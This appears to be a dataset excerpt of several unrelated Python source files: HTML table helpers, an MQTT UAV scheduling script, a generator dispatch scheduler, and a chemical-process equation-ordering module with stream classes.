    show = f'<a id="myLink" href="javascript:showstuff({id!s});">show</a>'
    hide = f'<a id="myLink" href="javascript:hidestuff({id!s});">hide</a>'
    return show + " " + hide
def make_cell_link(cell, link):
    """Wrap *cell* in a <td> containing an anchor pointing at *link*."""
    return f"<td><a href={link!s}>{cell!s}</a></td>"
def make_line(line):
    """Wrap one row of cells in <tr>...</tr> tags (module constants SHR/EHR)."""
    return "".join((SHR, line, EHR))
def make_table(c, name):
    """Wrap content *c* in the table opening/closing markup.

    *name* is accepted for interface compatibility but not used.
    """
    return f"{STABLE} {c} {ETABLE} "
def make_div(c, name, css):
    """Wrap *c* in a <div> whose name and id are *name* and class is *css*."""
    return f"<div class={css!s} name={name!s} id={name!s}>{c!s}</div>"
def make_jshtml(c, name):
    """Assemble the DataTables index page around content *c*.

    *name* is accepted for interface compatibility but not used.
    """
    return f"{JSSTART} {c} {END} "
def make_html(c, showseq, name):
    """Assemble a cluster detail page: head + *showseq* markup + body *c*.

    *name* is accepted for interface compatibility but not used.
    """
    page_head = "".join((START1, showseq, START2))
    return f"{page_head} {c} {END} "
def make_header(c):
    """Wrap header cells *c* in <thead><tr>...</tr></thead> and open <tbody>."""
    return f"<thead><tr>{c!s}</tr></thead><tbody>"
def make_cell_header(c):
    """Wrap *c* in a table-header (<th>) tag followed by a newline."""
    return f"<th>{c!s}</th>\n"
def make_a(c, name):
    """Wrap *c* in a named anchor (<a name=...>) followed by a newline."""
    return f"<a name={name!s}>{c!s}</a>\n"
def make_link(c, link):
    """Wrap *c* in an anchor whose href is *link*."""
    return f"<a href={link!s}>{c!s}</a>"
| 29 | 210 | 0.658456 |
d8698eb6f4a5c4caa030663f996926a1f91653e9 | 5,255 | py | Python | uav.py | ashishkishor/Internet-of-Things-IOT- | 1cfd9f4890ee39111f1a1610e45c378299e30698 | [
"MIT"
] | null | null | null | uav.py | ashishkishor/Internet-of-Things-IOT- | 1cfd9f4890ee39111f1a1610e45c378299e30698 | [
"MIT"
] | null | null | null | uav.py | ashishkishor/Internet-of-Things-IOT- | 1cfd9f4890ee39111f1a1610e45c378299e30698 | [
"MIT"
] | null | null | null | import paho.mqtt.client as mqttClient
import time
import random
import math
import sys
import json
#importing all the libraries
# --- Module-level state shared by the MQTT callbacks and the main loop -------
all_data=[]  # preferences received from the other UAVs (list of {1: uav-id, 2: pref})
ls=[]  # ids of vehicles still unassigned (used to break ties)
all_clients = []  # names of every UAV in the system ("uav1", "uav2", ...)
uav_location=[]  # this UAV's waypoints, read from <client_name>.txt
total_input=0  # number of scheduling rounds completed so far
r=int(sys.argv[2])  # argv[2] = total number of UAVs in the system
for i in range(1, r):
    all_clients.append('uav' + str(i))
    ls.append(i)
vehicle_location = []  # vehicle positions received from HQ ({1: x, 2: y} dicts)
ans=[]  # per-round (vehicle id, distance) records, sorted by distance
v={}  # scratch dict reused inside the main loop
def distance(curr, to):
    """Euclidean distance between two points stored as {1: x, 2: y} dicts."""
    dx = to[1] - curr[1]
    dy = to[2] - curr[2]
    return math.sqrt(dx * dx + dy * dy)
def on_connect(client, userdata, flags, rc):
    """MQTT connect callback: report the result and flag a good connection.

    Sets the module-level ``Connected`` flag to True on success (rc == 0).
    """
    global Connected
    if rc != 0:
        print("Connection failed Return Code : ", rc)
        return
    print("Connected to broker")
    Connected = True  # Signal connection
def on_message(client, userdata, message):
    """MQTT message callback.

    Two kinds of messages arrive on this client:
    - topic ``location/hq``: a whitespace-separated list of 6 vehicle
      coordinate pairs; each pair is appended to the module-level
      ``vehicle_location`` list as a {1: x, 2: y} dict.
    - any other topic (``location/uav<N>``): the payload is another UAV's
      preferred vehicle id; it is stored in ``all_data`` together with the
      sender's id (last character of the topic).
    """
    payload = str(message.payload.decode("utf-8", "ignore"))
    if message.topic == 'location/hq':
        tokens = payload.split()
        # 6 vehicles -> 12 numbers, consumed two at a time as (x, y).
        for i in range(0, 12, 2):
            vehicle_location.append({1: int(tokens[i]), 2: int(tokens[i + 1])})
    else:
        # Sender id is the trailing digit of "location/uav<N>".
        all_data.append({1: message.topic[-1], 2: int(payload)})
# --- Setup: identify this UAV, load its waypoints and connect to the broker --
client_name = sys.argv[1]  # argv[1] = this UAV's number
client_name="uav"+client_name
print(client_name)
broker_address = "127.0.0.1"  # MQTT broker address (localhost)
port = 1883
# Waypoints file: one "x y" pair per line, named after the UAV.
with open(str(client_name)+".txt","r") as fp:
    lines=fp.readlines()
    for line in lines:
        a=line.split()
        uav_location.append(dict({1:int(a[0]),2:int(a[1])}))
# Create the MQTT client and attach the callbacks defined above.
client = mqttClient.Client(client_name)
client.on_connect = on_connect  # attach function to callback
client.on_message = on_message  # attach function to callback
client.connect(broker_address, port=port)  # connect to broker
client.loop_start()  # start the network loop in a background thread
client.subscribe("location/hq")  # HQ broadcasts vehicle positions here
for item in all_clients:  # listen to every other UAV's preference topic
    if (item != client_name):
        client.subscribe("location/" + item)
# Give the callbacks time to receive the first HQ broadcast.
time.sleep(6)
# --- Main scheduling loop ----------------------------------------------------
# One ~10 s round per waypoint: rank vehicles by distance, exchange
# preferences with the other UAVs over MQTT, then report the assignment to HQ.
# NOTE(review): block indentation reconstructed from semantics — original
# formatting was mangled; loop_stop/exit assumed to sit after the while loop.
end_time=time.time()+len(uav_location)*10
while time.time() < end_time:
    print(len(uav_location))
    print(len(vehicle_location))
    # Distance from the current waypoint to every vehicle reported by HQ.
    for i in range(0, len(vehicle_location)):
        v = dict({1: i + 1, 2: distance(vehicle_location[i], uav_location[total_input%len(uav_location)])})
        ans.append(v)
    ans=sorted(ans, key=lambda i: i[2])  # nearest vehicle first
    print(ans)
    preferred_list=[]  # vehicle ids in order of preference (nearest first)
    for i in ans:
        preferred_list.append(i[1])
    print(preferred_list)
    print("ashish")
    ans = []
    vehicle_location = []
    time.sleep(2)
    t0=time.time()
    # Broadcast this UAV's top preference to the other UAVs.
    client.publish("location/" + client_name,str(preferred_list[0]))
    total_input+=1
    time.sleep(5)  # wait for the other UAVs' preferences to arrive
    value=""
    all_data=sorted(all_data,key=lambda i:i[1])  # sort peers by their id
    print(all_data)
    # Lower-id UAVs win ties: drop vehicles already claimed by them.
    for i in all_data:
        if(int(i[1])<int(client_name[len(client_name)-1])):
            preferred_list.remove(i[2])
    value+=str(int(client_name[len(client_name)-1])) +"#"+str(preferred_list[0])
    """
    for i in range(len(all_clients)):
        flag=0
        #print(i+1)
        for j in all_data[i][2]:
            #print(j)
            if(j in ls):
                value.append(dict({1:i+1, 2: j}))
                ls.remove(j)
                flag=1
        if(flag==1):
            break
    """
    ls=[]
    # Report "<uav id>#<assigned vehicle>" back to HQ.
    client.publish("preference/" + client_name, str(value))
    t1 = time.time()
    preferred_list = []
    value=""
    all_data=[]
    for i in range(0,7):
        ls.append(i)
    time.sleep(3)
client.loop_stop()
print("exiting")
| 31.848485 | 108 | 0.618649 |
ed22a40875a7bcb48174eea7fe92f2b936a35ac3 | 8,389 | py | Python | MiGRIDS/Model/Controls/genSchedule0.py | mmuellerstoffels/GBSTools | aebd8aa6667a2284aaa16424f9b9d22ca3a2a375 | [
"MIT"
] | 8 | 2019-02-18T14:18:55.000Z | 2022-03-04T12:34:24.000Z | MiGRIDS/Model/Controls/genSchedule0.py | mmuellerstoffels/GBSTools | aebd8aa6667a2284aaa16424f9b9d22ca3a2a375 | [
"MIT"
] | 3 | 2019-02-13T09:42:08.000Z | 2019-05-10T16:59:02.000Z | MiGRIDS/Model/Controls/genSchedule0.py | acep-uaf/GBSTools | aebd8aa6667a2284aaa16424f9b9d22ca3a2a375 | [
"MIT"
] | 3 | 2019-06-10T19:49:22.000Z | 2021-05-08T08:42:57.000Z |
# Project: GBS Tool
# Author: Jeremy VanderMeer, jbvandermeer@alaska.edu, Alaska Center for Energy and Power
# Date: October 1, 2018
# License: MIT License (see LICENSE file of this package for more information)
# imports
import numpy as np
class genSchedule:
    """Diesel generator dispatch scheduler (rule 0).

    Given a load/renewable forecast and spinning-reserve (SRC) requirements,
    picks the generator combination that should be online and either switches
    to it immediately or starts warming up the generators it needs.
    """

    def __init__(self,args):
        """
        Args:
            args: dict of scheduler options; only ``minimizeFuel`` is read.
        """
        # whether to try to minimize fuel consumption or maximize RE
        # contribution (by minimizing the MOL of the generators)
        self.minimizeFuel = args['minimizeFuel']

    def runSchedule(self, ph, futureLoad, futureRE, scheduledSRCSwitch, scheduledSRCStay, powerAvailToSwitch, powerAvailToStay, underSRC):
        """Select and (eventually) switch to the best generator combination.

        Args:
            ph: Powerhouse object holding generators, their combinations and
                lookup tables (combination loadings, MOLs, fuel curves, ...).
            futureLoad: predicted load [kW].
            futureRE: predicted renewable contribution [kW].
            scheduledSRCSwitch: SRC required if switching combinations.
            scheduledSRCStay: SRC required if the current combination stays on.
            powerAvailToSwitch: power other sources can supply when switching.
            powerAvailToStay: power other sources can supply to stay online.
            underSRC: True if the system currently lacks spinning reserve.
        """
        # scheduled load is the difference between load and RE, the min of
        # what needs to be provided by gen or ess
        scheduledLoad = max(futureLoad - futureRE,0)
        ## first find all generator combinations that can supply the load
        ## within their operating bounds
        # find all with capacity over the load and the required SRC
        capReq = max(int(scheduledLoad - powerAvailToSwitch + scheduledSRCSwitch),0)
        indCap = np.asarray(ph.lkpGenCombinationsUpperNormalLoading.get(capReq, ph.genCombinationsUpperNormalLoadingMaxIdx), dtype=int)
        # check if the current online combination is capable of supplying the
        # projected load minus the power available to help it stay online
        # keep current generating combination in the mix unless it has gone
        # out of bounds for the allotted amount of time
        if ph.onlineCombinationID not in indCap and not (True in ph.outOfNormalBounds) and not underSRC:
            indCap = np.append(indCap,ph.onlineCombinationID)
        # if there are no gen combinations large enough to supply,
        # automatically add largest (last combination)
        if indCap.size == 0:
            indCap = np.append(indCap,len(ph.genCombinationsUpperNormalLoading)-1)
            indInBounds = indCap
        elif indCap.size == 1:
            indInBounds = indCap
        else:
            # find all with MOL under the load
            indMOLCap = [idx for idx, x in enumerate(ph.genCombinationsMOL[indCap]) if x <= futureLoad]
            # ind of in bounds combinations
            indInBounds = indCap[indMOLCap]
            # if there are no gen combinations with a low enough MOL to
            # supply, automatically add combination 1, which is the smallest
            # generator combination without turning off the generators
            if indInBounds.size == 0:
                indInBounds = np.array([indCap[0]])
        indInBounds = np.atleast_1d(indInBounds)
        ## then check how long it will take to switch to any of the
        ## combinations online
        lenGenerators = len(ph.generators)
        turnOnTime = [None]*lenGenerators
        turnOffTime = [None]*lenGenerators
        for idx, gen in enumerate(ph.generators):
            # get the time remaining to turn on each generator; include this
            # time step in the calculation, which avoids having to wait 1
            # time step longer than necessary to bring a generator online
            turnOnTime[idx] = gen.genStartTime - gen.genStartTimeAct - ph.timeStep
            # get the time remaining to turn off each generator
            turnOffTime[idx] = gen.genRunTimeMin - gen.genRunTimeAct - ph.timeStep
        # Go through each potential combination of generators and find which
        # generators need to be switched on and offline for each combination
        lenIndInBounds = indInBounds.size
        genSwOn = []  # the generators to be switched on for each possible combination
        genSwOff = []  # the generators to be switched off for each possible combination
        timeToSwitch = [None]*lenIndInBounds  # the time to switch for each in-bounds combination
        fuelCons = [None]*lenIndInBounds  # the predicted fuel consumption for each combination
        for ind, idx in enumerate(np.atleast_1d(indInBounds)):  # for each combination that is in bounds
            # initiate the generators to be switched on for this combination
            # to all generators in the combination
            genSwOn.append(list(ph.genCombinationsID[idx]))
            # initiate the generators to be switched off for this combination
            # to all generators currently online
            genSwOff.append(list(ph.genCombinationsID[ph.combinationsID.index(ph.onlineCombinationID)]))
            # find common elements between switch on and switch off lists
            commonGen = list(set(genSwOff[-1]).intersection(genSwOn[-1]))
            # remove common generators from both lists
            for genID in commonGen:
                genSwOn[-1].remove(genID)
                genSwOff[-1].remove(genID)
            # for each gen to be switched get the time; the max time for the
            # combination is the time it will take to bring it online
            onTime = 0
            for genID in genSwOn[-1]:  # for each generator brought online in this combination
                onTime = max(onTime,turnOnTime[ph.genIDS.index(genID)])  # max turn on time
            # find max of turn on time and turn off time
            SwitchTime = onTime  # initiate to max turn on time
            for genID in genSwOff[-1]:  # for each generator to be switched off
                SwitchTime = max(SwitchTime, turnOffTime[ph.genIDS.index(genID)])
            timeToSwitch[ind] = SwitchTime
            if self.minimizeFuel:
                # get the generator fuel consumption at this loading for this
                # combination
                FCpower, FCcons = zip(*ph.genCombinationsFCurve[idx])  # separate out the consumption and power
                # If this is the online combination, use the power available
                # to stay online to calculate the load required by the
                # generator; otherwise use the power available to switch.
                if idx == ph.onlineCombinationID:
                    useScheduledLoad = int(max([scheduledLoad - powerAvailToStay, ph.genCombinationsMOL[idx]]))
                else:
                    useScheduledLoad = int(max([scheduledLoad - powerAvailToSwitch, ph.genCombinationsMOL[idx]]))
                # NOTE(review): getIntListIndex is defined elsewhere in this
                # module — it maps a load value to an index in FCpower.
                indFCcons = getIntListIndex(useScheduledLoad, FCpower)
                fuelCons[ind] = FCcons[indFCcons]
        # TODO: Add cost of switching generators
        ## bring on the best option that can be switched immediately, if any;
        ## if the most efficient option can't be switched, start warming up
        ## generators
        # order the candidate combinations: by predicted fuel consumption, or
        # by MOL when maximizing renewable contribution
        if self.minimizeFuel:
            indSort = np.argsort(fuelCons)
        else:
            indSort = np.argsort(ph.genCombinationsMOL[indInBounds])
        # if the most efficient can be switched on now, switch to it
        if timeToSwitch[indSort[0]] <= 0:
            # update online generator combination
            ph.onlineCombinationID = ph.combinationsID[indInBounds[indSort[0]]]
            ph.switchGenComb(genSwOn[indSort[0]], genSwOff[indSort[0]])  # switch generators
            for idx in range(len(ph.genIDS)):
                # update genPAvail
                ph.generators[idx].updateGenPAvail()
        # otherwise, start or continue warming up generators for the most
        # efficient combination
        else:
            ph.startGenComb(genSwOn[indSort[0]])
        # otherwise, if a generator is out of bounds (not just normal bounds)
        # switch to the best possible combination that can switch now
        if (True in (np.array(timeToSwitch)<=0)) & (True in ph.outOfBounds):
            # find the most efficient option that can be switched now
            indBest = next((x for x in range(len(indSort)) if timeToSwitch[indSort[x]] <= 0 ))  # indBest wrt indSort
            # update online generator combination
            ph.onlineCombinationID = ph.combinationsID[indInBounds[indSort[indBest]]]
            ph.switchGenComb(genSwOn[indSort[indBest]],genSwOff[indSort[indBest]])  # switch generators
            for idx in range(len(ph.genIDS)):
                # update genPAvail
                ph.generators[idx].updateGenPAvail()
cbb79b1d910487205f22699a6b71e2116eae054e | 55,158 | py | Python | main.py | AntonioRochaAZ/ProcessEngineering | ce3bf779c20b5c7c190d5c1418ae299c0b5a17b1 | [
"MIT"
] | null | null | null | main.py | AntonioRochaAZ/ProcessEngineering | ce3bf779c20b5c7c190d5c1418ae299c0b5a17b1 | [
"MIT"
] | null | null | null | main.py | AntonioRochaAZ/ProcessEngineering | ce3bf779c20b5c7c190d5c1418ae299c0b5a17b1 | [
"MIT"
] | 1 | 2022-01-08T01:13:49.000Z | 2022-01-08T01:13:49.000Z | ### ALGORITMO DE ORDENAÇÃO DE EQUAÇÕES
from warnings import warn
import inspect
import numpy as np
import matplotlib.pyplot as plt
from typing import Tuple, Callable, Union, Dict, Generator
import networkx as nx
# TODO: Make it so that we cannot have two equipments or streams with the same name
# Also, add a few details to the aoe2 picking algorithm when mulitple choices are possible
# TODO: The dynamically defined functions are interesting, but I think it would
# be perhaps more useful if they were defined separately from the objects.
# We'll see in the future how this will develop.
# TODO: URGENT:
# Must stop checking and updating flow composition of outflows, since there
# may be chemical reactions that generate products. Keep the addition of the
# reactants though (never remove substances, only add them).
def aoe2(*fns: Callable, **xs: Union[float, int]):
"""Equation Ordering Algorithm.
The name aoe stands for "Algorítmo de Ordenação de Equações", which means
"Equation Ordering Algorithm". The '2' in the name stands for version 2.
Args:
*fns: Functions that represent the equations that must equal 0.
**xs: Specified/Known variable values.
Returns:
A tuple with the:
- The order in which the equations should be solved (expressed through a
list called ``func_seq``).
- The order in which the variables should be solved for (expressed
through a list called ``var_seq``).
- A list with the project variables (those that must be specified
or optimized).
"""
fns = list(fns)
for entry in fns:
if isinstance(entry, Process):
for equation in entry.equations():
fns.append(equation)
fns.remove(entry)
xs["flow"] = None
xs["equipment"] = None
xs["substance"] = None
# Function <-> Arguments dictionaries (NOT INVERSES)
func_dict = {} # function -> its arguments
var_dict = {} # arguments -> functions it relates to
for f in fns:
var_list = inspect.getfullargspec(f)[0]
func_dict[f] = var_list
for var in var_list:
if var not in var_dict:
var_dict[var] = [f]
else:
var_dict[var].append(f)
if 'plot' in var_dict:
raise NameError("Can't have 'plot' as variable name.")
elif 'graph' in var_dict:
raise NameError("Can't have 'graph' as a variable name.")
# Detecting whether or not the system of equations can be solved
if len(var_dict) < len(fns):
raise ValueError("Impossible system: more Equations than Variables.")
# Calculating the Incidence Matrix
inmx = np.zeros((len(fns), len(var_dict)))
for idx_f, f in enumerate(func_dict):
for idx_x, x in enumerate(var_dict):
if x in func_dict[f] and x not in xs:
inmx[idx_f, idx_x] = 1
#### Definitions
# Sequences:
func_seq = [None] * min(len(fns), len(var_dict))
var_seq = [None] * min(len(fns), len(var_dict))
# Insert indexes:
insert_idx_1 = 0
insert_idx_2 = -1
# List of indexes for opening variables:
go_back_list = []
# Dictionaries between number -> function/variable
num_func = {i: list(func_dict.keys())[i] for i in range(len(func_dict))}
num_var = {i: list(var_dict.keys())[i] for i in range(len(var_dict))}
# Dictionaries between function/variable -> number
func_num = {y: x for x, y in num_func.items()}
var_num = {y: x for x, y in num_var.items()}
def plot_incidence_matrix(inmx, ax=None):
if ax is None:
fig, ax = plt.subplots(1, 1)
img = ax.imshow(inmx)
ax.set_xticks([i for i in range(len(var_dict))])
ax.set_xticklabels([key for key in var_dict])
ax.set_yticks([i for i in range(len(fns))])
ax.set_yticklabels([key.__name__ for key in func_dict])
ax.set_ylabel("Functions")
ax.set_xlabel("Variables")
plt.show(block=True)
if ('graph' in xs) and (xs['graph']):
# TODO: solve the graph "problem"
# (Make a botch so that lines can 'bifurcate')
# Solution (implemented): make nodes for variables too.
function_graph = nx.Graph()
function_graph.add_nodes_from(list((f.__name__, {"subset": 1}) for f in fns))
edge_graph = nx.Graph()
edge_graph.add_nodes_from(list((f.__name__, {"subset": 1}) for f in fns))
edge_list = []
label_dict = {}
for variable in var_dict:
functions = var_dict[variable]
# if len(functions) > 2 or len(functions) == 1:
edge_graph.add_nodes_from([(variable, {'subset': 2})])
for idx1 in range(len(functions)):
if len(functions) == 1:
t = (variable, functions[idx1].__name__)
edge_list.append(t)
label_dict[t] = variable
for idx2 in range(idx1+1, len(functions)):
# if len(functions) > 2:
t1 = (functions[idx1].__name__, variable)
t2 = (variable, functions[idx2].__name__)
edge_list.append(t1)
edge_list.append(t2)
label_dict[t1] = variable
label_dict[t2] = variable
# elif len(functions) == 2:
# t = (functions[idx1].__name__, functions[idx2].__name__)
# edge_list.append(t)
# label_dict[t] = variable
edge_graph.add_edges_from(edge_list)
# graph.add_edges_from(edge_list)
function_graph_options = {
'with_labels': True,
'node_color': 'lightgray',
'node_size': 500
}
edge_graph_options = {
'with_labels': True,
'node_color': 'lightblue',
'node_size': 500
}
hidden_pos = nx.multipartite_layout(edge_graph)
pos = {}
for key in hidden_pos:
if key in function_graph.nodes():
pos[key] = hidden_pos[key]
def plot_graph(ax = None, show: bool = False):
nx.draw(edge_graph, hidden_pos, **edge_graph_options, ax=ax)
nx.draw(function_graph, pos, **function_graph_options, ax=ax)
nx.draw_networkx_edge_labels(edge_graph, hidden_pos,
edge_labels=label_dict, ax=ax)
nx.draw_networkx_edges(edge_graph, hidden_pos, ax=ax)
if show:
plt.show(block=True)
def update_graph():
# Deleting variable nodes that are no longer present:
for idx_x in range(len(var_dict)): # number of columns
var = num_var[idx_x]
if (sum(inmx[:, idx_x]) == 0):
if var in edge_graph.nodes():
edge_graph.remove_node(var)
if var in label_dict.values():
iterable = list(label_dict.keys())
for key in iterable:
if label_dict[key] == var:
del label_dict[key]
# elif sum(inmx[:, idx_x]) == 1:
# if var not in edge_graph.nodes():
# # check in the incidence matrix in the variable is still there for some reason.
# # it it only shows up once, and it didn't before, a node has to be created.
# edge_graph.add_node(var)
# idx_f = np.argmax(inmx[:, idx_x])
# edge_graph.add_edge(var, num_func[idx_f].__name__)
for idx_f in range(len(fns)):
f = num_func[idx_f].__name__
if sum(inmx[idx_f, :]) == 0 and f in edge_graph.nodes():
function_graph.remove_node(f)
edge_graph.remove_node(f)
# Updating label_dict:
iterable = list(label_dict.keys())
for key in iterable:
if f in key:
var = label_dict[key]
del label_dict[key]
if ('plot' in xs) and (xs['plot']):
# Base inmx0 for plotting:
inmx0 = np.zeros((len(fns), len(var_dict)))
for idx_f, f in enumerate(func_dict):
for idx_x, x in enumerate(var_dict):
if x in func_dict[f]:
inmx0[idx_f, idx_x] = 1
fig, axs = plt.subplots(1, 2)
fig.set_size_inches(14, 8)
ax = axs[0]
plot_graph(axs[1])
plot_incidence_matrix(inmx0, ax)
else:
plot_graph()
elif ('plot' in xs) and (xs['plot']):
# Base inmx0 for plotting:
inmx0 = np.zeros((len(fns), len(var_dict)))
for idx_f, f in enumerate(func_dict):
for idx_x, x in enumerate(var_dict):
if x in func_dict[f]:
inmx0[idx_f, idx_x] = 1
plot_incidence_matrix(inmx0)
# The actual loop.
while True:
if ('plot' in xs) and (xs['plot']):
if ('graph' in xs) and (xs['graph']):
fig, axs = plt.subplots(1, 2)
fig.set_size_inches(14, 8)
update_graph()
plot_graph(axs[1])
ax = axs[0]
else:
fig, ax = plt.subplots(1, 1)
plot_incidence_matrix(inmx, ax)
elif ('graph' in xs) and (xs['graph']):
update_graph()
plot_graph(show=True)
# Test for equations with only one variable:
for idx_f, row in enumerate(inmx):
if sum(row) == 1:
idx_x = np.argmax(row)
func_seq[insert_idx_1] = idx_f
var_seq[insert_idx_1] = idx_x
insert_idx_1 += 1
inmx[:, idx_x] = 0
inmx[idx_f, :] = 0
print(f"\nSingle variable equation: {num_func[idx_f].__name__};"
f"\nAssociated Variable: {num_var[idx_x]}.")
break
else:
# If the loop didn't break, then no variables were updated
# Loop through columns to check for variables of unit frequency:
instances = np.zeros(len(var_dict))
for idx_x in range(inmx.shape[1]):
col = inmx[:, idx_x]
instances[idx_x] = sum(col)
if sum(col) == 1:
idx_f = np.argmax(col)
func_seq[insert_idx_2] = idx_f
var_seq[insert_idx_2] = idx_x
insert_idx_2 -= 1
inmx[idx_f, :] = 0
print(f"\nVariable of unit frequency: {num_var[idx_x]};\n"
f"Associated Equation: {num_func[idx_f].__name__}.")
break
else:
# Loops
instances[instances == 0] = 100
idx_x = np.argmin(instances)
x = num_var[idx_x]
for f in var_dict[x]:
idx_f = func_num[f]
if idx_f not in func_seq:
func_seq[insert_idx_2] = idx_f
go_back_list.append(insert_idx_2)
insert_idx_2 -= 1
inmx[idx_f, :] = 0
print(f"\nLOOP:\n"
f"\tEquation: {num_func[idx_f].__name__};")
break
else:
raise RuntimeError("Unexpected Error.")
# If the incidence matrix is empty
if not inmx.any():
break
# Variáveis de Abertura:
open_vars = []
if go_back_list:
for idx in go_back_list:
idx_list = list(range(len(var_seq)+idx))
# idx_list.reverse()
max_idx = -1
for x in func_dict[num_func[func_seq[idx]]]:
# If the variable hasn't been attributed:
if var_num[x] not in var_seq:
# Going backwards in the sequence:
for loop_idx in idx_list:
if x in func_dict[num_func[func_seq[loop_idx]]]:
if loop_idx > max_idx:
var_seq[idx] = var_num[x]
max_idx = loop_idx
print(f"\nSmallest loop so far: "
f"{x} with {len(var_seq)+idx - loop_idx} "
f"equations of distance.")
# Skip to the next variable
break
open_x = num_var[var_seq[idx]]
print(f"\nOpening variable: {open_x}")
open_vars.append(open_x)
# for x in func_dict[num_func[func_seq[idx]]]: # ai ai
#
#
# if var_num[x] not in var_seq:
# var_seq[idx] = var_num[x]
# break
var_seq = [num_var[i] for i in var_seq]
func_seq = [num_func[i] for i in func_seq]
proj_vars = [x for x in var_dict if x not in var_seq]
print(
f"\nEquation sequence:\n",
*(f"\t- {func.__name__};\n" for func in func_seq),
f"\nVariable sequence:\n",
*(f"\t- {x};\n" for x in var_seq),
)
if open_vars:
print(
f"Opening variables:\n",
*(f"\t- {x};\n" for x in open_vars)
)
if proj_vars:
print(
f"Project Variables:\n",
*(f"\t- {x};\n" for x in proj_vars)
)
return func_seq, var_seq, proj_vars
class Substance:
"""Class for a chemical substance.
Class Attributes:
_name: The molecule's _name
mm: Molar mass (kg/kmol).
composition: The number of atoms of each element that the molecule has.
atomic_mass: Look-up table for atomic masses.
"""
name = None
mm = None
T_boil = None
latent_heat = None
composition = {
"H": 0,
"He": 0,
# ...
}
@staticmethod
def remove_substances(cls_inst: Union['Flow', 'Equipment'], *substances: 'Substance'):
"""Method for removing substances from a current or equipment.
"""
for substance in substances:
try:
cls_inst.composition.remove(substance)
except ValueError: # ValueError: list.remove(x): x not in list
continue
cls_inst._x.pop(f'x_{cls_inst.name}_{substance.name}')
@classmethod
def cp(substance, T, T_ref: None) -> float:
"""Function for calculating the substance's cp value at a given
temperature T or its mean cp value at a temperature range [T, T_ref]
(or [T, T_ref])
.. warning::
ENERGY BALANCES IMPLICITLY ASSUME THAT CP OF COMPLEX SOLUTIONS IS
THE WEIGHTED MEAN OF THE INDIVIDUAL SUBSTANCES' CPs.
Args:
T: The stream's temperature [K].
T_ref: The temperature we are using as a reference [K].
Returns:
The mean Cp value at the temperature interval.
If there's a phase change, then it will automatically add the
latent heat term in such a way that, when the result is multiplied
by (T-T_ref), we get the correct result for energy/mass flow rate
"""
if T_ref is not None:
if T < substance.T_boil and substance.T_boil < T_ref:
# it's divided by the (T-Tref) so we can get the correct
# values when we mutiply it by that factor
# Mean at liquid * (Tboil - T_ref)/(T-T_ref)
# + (latent_heat/(T - T_ref))
# + Mean at vapour * (T_ref - Tboil)/(T-T_ref)
pass
elif T > substance.T_boil and substance.T_boil > T_ref:
# Wait, is it the same expression? I think so.
pass
else:
# Do the mean at the interval
pass
else:
# Do the mean at the interval
pass
class Flow:
"""A process current.
TODO: There still need to be constant updates of the w, wmol, x, xmol
quantities.
Class Attributes:
tolerance: Tolerance for mass/molar fraction sum errors.
Attributes:
composition: A list with the substances present in the flow.
w: Flow rate (mass per unit time).
x: A ``dict`` for storing the value of the mass fractions.
Each entry corresponds to a component. Sum must
equal one. Unknown values are marked as ``None``.
wmol: Flow rate (mol per unit time).
xmol: Molar fractions.
T: Temperature (in K).
"""
tolerance = 0.05
    def __init__(self, name: str, *substances: Substance, **info: float):
        """Create a process current.

        Args:
            name: The flow's name; must be usable inside a Python identifier
                (validated by :meth:`_update_restriction`, which re-prompts
                on invalid names).
            *substances: :class:`Substance` objects present in the flow.
            **info: Known data — mass fractions keyed by substance name,
                and/or the mass flow rate ``w`` (see :meth:`add_info`).
        """
        if substances == ():
            warn("No substances informed.")
        self.composition = list(substances)
        self.equations = {}  # Actual equations
        self._equations = {}  # Equations checked by aoe.
        # Name and restriction addition:
        if not isinstance(name, str):
            raise TypeError("Please inform a valid name (string type).")
        self._update_restriction(name)  # self._name is defined here.
        # Composition and flow rate information (None = unknown):
        self.w = None
        self.x = {}
        self._x = {}
        for substance in substances:
            self.x[substance] = None
            self._x[f'x_{self.name}_{substance.name}'] = None
        self.T = None
        self.add_info(**info)
        # Equipment (connection) information:
        self.leaves = None
        self.enters = None
def __str__(self):
return self.name
def __contains__(self, item: Substance):
if item in self.composition:
return True
else:
return False
    @property
    def name(self):
        """Read-only flow name (set via :meth:`_update_restriction`)."""
        return self._name
@staticmethod
def restriction(flow: 'Flow') -> float:
"""Mass fraction restriction equation (sum(x) = 1).
.. warning::
As of now, the code ignores the ``None`` values (considers them
as equal to zero). No Exception is raised.
Args:
flow: A Flow object
Returns:
The sum of the stream's mass fractions minus 1.
"""
x = list(flow.x.values())
try:
while True:
x.remove(None)
except ValueError: # list.remove(None): None not in list.
pass
# TODO: should an error be generated when None is still specified?
# added the "float" because I may change the type of x in the future.
return float(sum(x)) - 1
    def add_info(self, **info: float):
        """Record known stream data (mass fractions and/or flow rate).

        Keyword keys matching a substance name set that substance's mass
        fraction (must lie in [0, 1]); the key ``w`` sets the mass flow
        rate (must be non-negative).  Unknown keys only raise a warning.
        On any validation failure the previous ``x`` dict is restored and
        ValueError is re-raised.

        Raises:
            ValueError: invalid fraction/flow value, or sum(x) exceeds
                1 + ``Flow.tolerance``.
        """
        # TODO: add this info to the equations? How will this work?
        backup_x = self.x.copy()  # rollback copy in case validation fails
        dictionary = {substance.name: substance for substance in self.x}
        try:
            for kwarg in info:
                data = info[kwarg]
                if kwarg in dictionary:
                    if data > 1 or data < 0:
                        raise ValueError(
                            f"Informed an invalid value for a mass fraction: "
                            f"{kwarg} = {data}."
                        )
                    self.x[dictionary[kwarg]] = data
                    self._x[f"x_{self.name}_{kwarg}"] = data
                elif kwarg == "w":
                    if data < 0:
                        raise ValueError(
                            f"Informed a negative flow rate: "
                            f"{kwarg} = {data}."
                        )
                    self.w = data
                # Add more information in the future.
                else:
                    warn(f"User unknown specified property: {kwarg} = {data}.")
            if self.restriction(self) > Flow.tolerance:
                raise ValueError("Restriction Error: sum(x) > 1.")
        except ValueError as e:
            # Restore the pre-call fractions before propagating.
            self.x = backup_x
            raise ValueError(e)
def add_substances(self, *substances: Substance, **info: float):
"""Method for adding substances to the current.
Args:
substances: :class:`Substance` objects of the substances we want to
add.
info: Additional info we want to add the the flow's attributes. It
doesn't have to be related the the substances that are being
added.
"""
for substance in substances:
if substance in self.composition:
continue
else:
self.composition.append(substance)
self.x[substance] = None
self._x[f'x_{self.name}_{substance.name}'] = None
self.add_info(**info)
self._update_restriction(self.name) # Updating the restriction function
def remove_substances(self, *substances: Substance, **info: float):
for substance in substances:
if substance not in self.composition:
continue
else:
self._x.pop(f'x_{self.name}_{substance.name}')
self.x.pop(substance)
# Update mass and molar fractions
